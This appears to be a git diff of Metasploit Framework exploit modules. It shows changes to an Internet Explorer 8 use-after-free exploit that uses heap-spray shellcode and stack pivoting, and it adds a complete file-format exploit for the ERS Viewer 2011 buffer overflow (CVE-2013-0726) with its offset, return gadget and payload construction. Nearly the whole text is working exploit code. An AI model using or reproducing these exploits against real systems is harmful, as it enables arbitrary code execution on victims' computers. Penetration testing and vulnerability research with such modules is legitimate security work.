js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))
|
||||
|
||||
p = get_payload(my_target, cli)
|
||||
js = ie8_smil(my_target, p)
|
||||
|
||||
html = %Q|
|
||||
<!doctype html>
|
||||
|
@ -293,9 +223,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
</meta>
|
||||
|
||||
<script>
|
||||
#{js_mstime_malloc}
|
||||
|
||||
function helloWorld()
|
||||
{
|
||||
#{js}
|
||||
f0 = document.createElement('span');
|
||||
document.body.appendChild(f0);
|
||||
f1 = document.createElement('span');
|
||||
|
@ -306,21 +237,32 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
f2.appendChild(document.createElement('datalist'));
|
||||
f1.appendChild(document.createElement('span'));
|
||||
f1.appendChild(document.createElement('table'));
|
||||
try{
|
||||
f0.offsetParent=null;
|
||||
}catch(e) {
|
||||
|
||||
}f2.innerHTML="";
|
||||
try { f0.offsetParent=null;}
|
||||
catch(e) { }
|
||||
|
||||
f2.innerHTML = "";
|
||||
f0.appendChild(document.createElement('hr'));
|
||||
f1.innerHTML="";
|
||||
f1.innerHTML = "";
|
||||
|
||||
CollectGarbage();
|
||||
|
||||
try {
|
||||
a = document.getElementById('myanim');
|
||||
a.values = animvalues;
|
||||
sparkle = unescape("ABCD");
|
||||
for (i=0; i < 2; i++) {
|
||||
sparkle += unescape("ABCD");
|
||||
}
|
||||
catch(e) {}
|
||||
sparkle += unescape("AB");
|
||||
sparkle += unescape("#{js_payload}");
|
||||
|
||||
magenta = unescape("#{align_esp}");
|
||||
|
||||
for (i=0; i < 0x70/4; i++) {
|
||||
if (i == 0x70/4-1) { magenta += unescape("#{xchg_esp}"); }
|
||||
else { magenta += unescape("#{align_esp}"); }
|
||||
}
|
||||
|
||||
magenta += sparkle;
|
||||
mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:"myanim"});
|
||||
}
|
||||
|
||||
</script>
|
||||
|
@ -341,7 +283,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Requesting: #{uri}")
|
||||
|
||||
my_target = get_target(agent)
|
||||
# Avoid the attack if no suitable target found
|
||||
if my_target.nil?
|
||||
print_error("Browser not supported, sending 404: #{agent}")
|
||||
send_not_found(cli)
|
||||
|
@ -355,4 +296,3 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
|
@ -0,0 +1,99 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "ERS Viewer 2011 ERS File Handling Buffer Overflow",
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow vulnerability found in ERS Viewer 2011
|
||||
(version 11.04). The vulnerability exists in the module ermapper_u.dll where the
|
||||
function ERM_convert_to_correct_webpath handles user provided data in a insecure
|
||||
way. It results in arbitrary code execution under the context of the user viewing
|
||||
a specially crafted .ers file. This module has been tested successfully with ERS
|
||||
Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Parvez Anwar', # Vulnerability Discovery
|
||||
'juan vazquez' # Metasploit
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2013-0726' ],
|
||||
[ 'OSVDB', '92694' ],
|
||||
[ 'BID', '59379' ],
|
||||
[ 'URL', 'http://secunia.com/advisories/51725/' ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 7516,
|
||||
'BadChars' => "\x22\x5c" +
|
||||
(0x7f..0xff).to_a.pack("C*") +
|
||||
(0x00..0x08).to_a.pack("C*") +
|
||||
(0x0a..0x1f).to_a.pack("C*"),
|
||||
'DisableNops' => true,
|
||||
'EncoderOptions' =>
|
||||
{
|
||||
'BufferRegister' => 'ESP'
|
||||
}
|
||||
},
|
||||
'SaveRegisters' => [ 'ESP' ],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'ExitFunction' => "process",
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'ERS Viewer 2011 (v11.04) / Windows XP SP3 / Windows 7 SP1',
|
||||
{
|
||||
'Offset' => 260,
|
||||
'Ret' => 0x67097d7a # push esp # ret 0x08 from QtCore4.dll
|
||||
}
|
||||
],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Apr 23 2013",
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [ true, 'The file name.', 'msf.ers']),
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
# Rewrote it because make_nops is ignoring SaveRegisters
|
||||
# and corrupting ESP.
|
||||
def make_nops(count)
|
||||
return "\x43" * count # 0x43 => inc ebx
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
buf = rand_text(target['Offset'])
|
||||
buf << [target.ret].pack("V")
|
||||
buf << make_nops(8) # In order to keep ESP pointing to the start of the shellcode
|
||||
buf << payload.encoded
|
||||
|
||||
ers = %Q|
|
||||
DatasetHeader Begin
|
||||
Name = "#{buf}"
|
||||
DatasetHeader End
|
||||
|
|
||||
|
||||
file_create(ers)
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue